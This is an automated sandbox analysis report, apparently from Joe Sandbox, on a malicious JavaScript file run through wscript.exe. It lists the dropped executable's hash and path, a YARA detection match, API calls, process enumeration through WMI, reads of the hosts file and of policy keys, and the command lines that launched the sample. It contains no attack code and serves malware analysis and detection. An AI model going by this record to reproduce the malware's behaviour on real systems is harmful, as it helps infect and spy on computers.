
Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 62A95C926C8513C9F3ACF65A5B33CBB88174555E2759C1B52DD6629F743A59ED

Source: xPUqa4qbDL.js

Initial sample: Strings found which are bigger than 50

Source: ibfmvoj.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ibfmvoj.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ibfmvoj.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ibfmvoj.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 0000000B.00000003.238666236.0000025BBBBB1000.00000004.00000001.sdmp, type: MEMORY

Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =

Source: classification engine

Classification label: mal88.evad.winJS@13/12@3/3

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0B96954 FormatMessageW,GetLastError,WideCharToMultiByte,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,SysAllocString,LocalFree,LocalFree,

7_2_00007FF7C0B96954

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0BA2D74 FindResourceExW,LoadResource,FindResourceExW,LoadResource,SetLastError,

7_2_00007FF7C0BA2D74

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\nsoerwoel

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: xPUqa4qbDL.js

Virustotal: Detection: 35%

Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxje
